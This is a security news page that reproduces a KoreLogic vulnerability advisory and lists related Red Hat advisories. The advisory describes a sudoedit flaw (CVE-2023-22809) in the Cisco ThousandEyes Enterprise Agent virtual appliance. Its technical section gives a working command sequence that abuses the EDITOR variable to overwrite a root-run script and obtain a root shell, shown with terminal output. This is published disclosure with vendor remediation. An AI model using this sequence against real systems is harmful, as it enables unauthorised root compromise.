Security
Headlines
HeadlinesLatestCVEs

Headline

Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification

Cisco ThousandEyes Enterprise Agent Virtual Appliance version thousandeyes-va-64-18.04 0.218 suffers from an unpatched vulnerability in sudoedit, allowed by sudo configuration, which permits a low-privilege user to modify arbitrary files as root and subsequently execute arbitrary commands as root.

Packet Storm
#vulnerability#ubuntu#linux#cisco#samba#acer

Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification

KL-001-2023-003: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoeditTitle: Cisco ThousandEyes Enterprise Agent Virtual Appliance Arbitrary File Modification via sudoeditAdvisory ID: KL-001-2023-003Publication Date: 2023.08.17Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2023-003.txt1. Vulnerability Details      Affected Vendor: ThousandEyes      Affected Product: ThousandEyes Enterprise Agent Virtual Appliance      Affected Version: thousandeyes-va-64-18.04 0.218      Platform: Linux / Ubuntu 18.04      CWE Classification: CWE-1395: Dependency on Vulnerable                          Third-Party Component      CVE ID: CVE-2023-228092. Vulnerability Description      An unpatched vulnerability in 'sudoedit', allowed by sudo      configuration, permits a low-privilege user to modify arbitrary      files as root and subsequently execute arbitrary commands as      root.3. Technical Description    The ThousandEyes Virtual Appliance is distributed with    a restrictive set of commands that can be executed via    sudo, without having to provide the password for the    'thousandeyes' account. However, the ability to execute    sudoedit of a specific file (/etc/hosts) via sudo is permitted    without requiring the password. The sudoedit binary can    be abused to allow the modification of any file on the    filesystem. This is a known security vulnerability (per    https://seclists.org/oss-sec/2023/q1/42), but had not been    disclosed for the ThousandEyes Virtual Appliance. This can be    abused to allow root-level compromise of the virtual appliance.      thousandeyes@thousandeyes-va:~$ id      uid=1000(thousandeyes) gid=1000(thousandeyes) groups=1000(thousandeyes),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),109(sambashare)      thousandeyes@thousandeyes-va:~$ sudo -l      Matching Defaults entries for thousandeyes on thousandeyes-va:          env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin      User thousandeyes may run the following commands on thousandeyes-va:          (ALL : ALL) ALL          (ALL) NOPASSWD: /bin/systemctl start te-va, /bin/systemctl stop te-va, /bin/systemctl restart te-va, /bin/systemctl status te-va, /bin/systemctl start te-agent, /bin/systemctl stop              te-agent, /bin/systemctl restart te-agent, /bin/systemctl status te-agent, /bin/systemctl start te-browserbot, /bin/systemctl stop te-browserbot, /bin/systemctl restart              te-browserbot, /bin/systemctl status te-browserbot, /sbin/reboot, sudoedit /etc/hosts, /usr/bin/dig, /usr/bin/lsof, /usr/bin/apt-get update, /usr/bin/apt-get install te-agent,              /usr/bin/apt-get install te-browserbot, /usr/bin/apt-get install te-va, /usr/bin/apt-get install te-pa, /usr/bin/apt-get install te-va-unlock, /usr/bin/apt-get install              te-intl-fonts, /usr/bin/apt-get install te-agent-utils, /usr/bin/apt-get install ntpdate, /usr/bin/apt-cache, /usr/bin/te-*, /usr/local/bin/te-*, /usr/local/sbin/te-*          (root) NOPASSWD: /usr/sbin/ntpdate, /usr/sbin/traceroute, /usr/sbin/tcpdump    Here we see that /usr/local/bin/te-* are executable as root with no    password. Even though sudoedit is only permitted to edit /etc/hosts,    we can use EDITOR= to spawn vim to edit an arbitrary file. Pick one    of those scripts because we can then execute it:      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config      /usr/local/bin/te-set-config: Python script, ASCII text executable      thousandeyes@thousandeyes-va:~$ EDITOR='vim -- /usr/local/bin/te-set-config' sudoedit /etc/hosts      sudoedit: --: editing files in a writable directory is not permitted      2 files to edit      sudoedit: /etc/hosts unchanged      thousandeyes@thousandeyes-va:~$ file /usr/local/bin/te-set-config      /usr/local/bin/te-set-config: ASCII text      thousandeyes@thousandeyes-va:~$ cat /usr/local/bin/te-set-config      /bin/bash      thousandeyes@thousandeyes-va:~$ sudo /usr/local/bin/te-set-config      root@thousandeyes-va:~# id      uid=0(root) gid=0(root) groups=0(root)      root@thousandeyes-va:~#4. Mitigation and Remediation Recommendation      The vendor has released a version which remediates the described      vulnerability. Release notes are available at:      https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwf189945. Credit      This vulnerability was discovered by Jim Becher of      KoreLogic, Inc.6. Disclosure Timeline      2023.04.26 - KoreLogic submits vulnerability details to Cisco.      2023.04.26 - Cisco acknowledges receipt and the intention to                   investigate.      2023.05.04 - Cisco notifies KoreLogic that a remediation for this                   vulnerability is expected to be available within                   90 days.      2023.06.30 - 45 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.07.11 - Cisco informs KoreLogic that the issue has been                   remediated in the latest ThousandEyes Virtual                   Appliance and a Third Party Software Release Note                   Enclosure will be released 2023.08.16. Cisco                   provides CVE-2023-22809 to track this vulnerability.      2023.07.24 - 60 business days have elapsed since KoreLogic reported                   this vulnerability to the vendor.      2023.08.16 - Cisco public acknowledgement.      2023.08.17 - KoreLogic public disclosure.7. Proof of Concept      See 3. Technical Description.The contents of this advisory are copyright(c) 2023KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.3.txt

Related news

CVE-2023-0041: IBM Security Guardium is affected by a multiple vulnerabilities (CVE-2023-22809, CVE-2019-12490, CVE-2013-0041)

[PROBLEMTYPE] in [COMPONENT] in [VENDOR] [PRODUCT] [VERSION] on [PLATFORMS] allows [ATTACKER] to [IMPACT] via [VECTOR]

RHSA-2023:3276: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: A vulnerability was found in sudo. Exposure in how sudoedit handles user-provided environment variables leads to arbitrary file writing with privileges of the RunAs user (usually root). The prereq...

RHSA-2023:3262: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 7.6 Advanced Update Support. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: A vulnerability was found in sudo. Exposure in how sudoedit handles user-provided environment variables leads to arbitrary file writing with privileges of the RunAs user (usually root). The prerequisite for exploitation is that the current user must be authorized by the sudoers policy to edit a file using sudoedit.

Red Hat Security Advisory 2023-0291-01

Red Hat Security Advisory 2023-0291-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0280-01

Red Hat Security Advisory 2023-0280-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0282-01

Red Hat Security Advisory 2023-0282-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

Red Hat Security Advisory 2023-0292-01

Red Hat Security Advisory 2023-0292-01 - The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.

RHSA-2023:0292: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

RHSA-2023:0282: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 9. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

RHSA-2023:0280: Red Hat Security Advisory: sudo security update

An update for sudo is now available for Red Hat Enterprise Linux 8.1 Update Services for SAP Solutions. Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original. Related CVEs: * CVE-2023-22809: sudo: arbitrary file write with privileges of the RunAs user

Packet Storm: Latest News

CUPS IPP Attributes LAN Remote Code Execution